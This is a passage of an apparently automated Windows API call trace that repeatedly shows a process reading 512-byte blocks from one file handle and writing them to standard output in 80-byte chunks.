_get_osfhandle (_FileHandle=1) returned 0x50 [0145.393] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.393] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.393] GetFileType (hFile=0x50) returned 0x1 [0145.393] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.393] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.394] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.394] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.394] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.394] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.394] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.394] GetFileType (hFile=0x50) returned 0x1 [0145.394] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.394] GetFileType (hFile=0x50) returned 0x1 [0145.394] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.394] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.394] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.394] GetFileType (hFile=0x50) returned 0x1 [0145.394] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.394] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.394] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.394] GetFileType (hFile=0x50) returned 0x1 [0145.394] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.394] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.394] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.394] GetFileType (hFile=0x50) returned 0x1 [0145.394] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.394] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.394] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.394] GetFileType (hFile=0x50) returned 0x1 [0145.394] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.394] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.395] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.395] GetFileType (hFile=0x50) returned 0x1 [0145.395] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.395] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.395] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.395] GetFileType (hFile=0x50) returned 0x1 [0145.395] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.395] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.395] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.395] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.395] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.395] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.395] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.395] GetFileType (hFile=0x50) returned 0x1 [0145.395] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.395] GetFileType (hFile=0x50) returned 0x1 [0145.395] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.395] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.395] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.395] GetFileType (hFile=0x50) returned 0x1 [0145.396] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.396] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.396] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.396] GetFileType (hFile=0x50) returned 0x1 [0145.396] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.396] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.396] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.396] GetFileType (hFile=0x50) returned 0x1 [0145.396] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.396] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.396] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.396] GetFileType (hFile=0x50) returned 0x1 [0145.396] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.396] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.396] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.396] GetFileType (hFile=0x50) returned 0x1 [0145.396] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.396] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.396] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.396] GetFileType (hFile=0x50) returned 0x1 [0145.396] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.396] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.396] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.397] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.397] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.397] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.397] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.397] GetFileType (hFile=0x50) returned 0x1 [0145.397] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.397] GetFileType (hFile=0x50) returned 0x1 [0145.397] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.397] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.397] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.397] GetFileType (hFile=0x50) returned 0x1 [0145.397] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.397] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.397] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.397] GetFileType (hFile=0x50) returned 0x1 [0145.397] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.397] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.397] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.397] GetFileType (hFile=0x50) returned 0x1 [0145.397] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.397] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.398] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.398] GetFileType (hFile=0x50) returned 0x1 [0145.398] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.398] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.398] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.398] GetFileType (hFile=0x50) returned 0x1 [0145.398] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.398] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.398] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.398] GetFileType (hFile=0x50) returned 0x1 [0145.398] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.398] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.398] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.398] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.398] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.398] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.398] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.398] GetFileType (hFile=0x50) returned 0x1 [0145.398] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.398] GetFileType (hFile=0x50) returned 0x1 [0145.398] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.398] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.398] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.398] GetFileType (hFile=0x50) returned 0x1 [0145.398] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.398] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.399] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.399] GetFileType (hFile=0x50) returned 0x1 [0145.399] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.399] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.399] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.399] GetFileType (hFile=0x50) returned 0x1 [0145.399] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.399] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.399] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.399] GetFileType (hFile=0x50) returned 0x1 [0145.399] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.399] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.399] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.399] GetFileType (hFile=0x50) returned 0x1 [0145.399] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.399] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.399] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.399] GetFileType (hFile=0x50) returned 0x1 [0145.399] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.399] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.399] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.399] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.399] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.399] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.400] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.400] GetFileType (hFile=0x50) returned 0x1 [0145.400] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.400] GetFileType (hFile=0x50) returned 0x1 [0145.400] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.400] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.400] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.400] GetFileType (hFile=0x50) returned 0x1 [0145.400] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.400] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.400] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.400] GetFileType (hFile=0x50) returned 0x1 [0145.400] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.400] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.400] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.400] GetFileType (hFile=0x50) returned 0x1 [0145.400] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.400] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.400] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.400] GetFileType (hFile=0x50) returned 0x1 [0145.400] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.400] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.400] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.400] GetFileType (hFile=0x50) returned 0x1 [0145.400] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.400] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.401] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.401] GetFileType (hFile=0x50) returned 0x1 [0145.401] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.401] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.401] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.401] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.401] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.401] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.401] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.401] GetFileType (hFile=0x50) returned 0x1 [0145.401] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.401] GetFileType (hFile=0x50) returned 0x1 [0145.401] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.401] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.401] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.401] GetFileType (hFile=0x50) returned 0x1 [0145.401] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.401] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.401] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.401] GetFileType (hFile=0x50) returned 0x1 [0145.401] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.401] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.402] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.402] GetFileType (hFile=0x50) returned 0x1 [0145.402] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.402] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.402] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.402] GetFileType (hFile=0x50) returned 0x1 [0145.402] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.402] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.402] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.402] GetFileType (hFile=0x50) returned 0x1 [0145.402] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.402] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.402] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.402] GetFileType (hFile=0x50) returned 0x1 [0145.402] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.402] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.402] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.402] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.402] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.402] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.402] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.402] GetFileType (hFile=0x50) returned 0x1 [0145.402] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.402] GetFileType (hFile=0x50) returned 0x1 [0145.402] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.403] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.403] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.403] GetFileType (hFile=0x50) returned 0x1 [0145.403] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.403] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.403] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.403] GetFileType (hFile=0x50) returned 0x1 [0145.403] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.403] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.403] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.403] GetFileType (hFile=0x50) returned 0x1 [0145.403] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.403] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.403] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.403] GetFileType (hFile=0x50) returned 0x1 [0145.403] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.403] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.403] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.403] GetFileType (hFile=0x50) returned 0x1 [0145.403] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.403] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.404] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.404] GetFileType (hFile=0x50) returned 0x1 [0145.404] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.404] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.404] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.404] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.404] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.404] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, 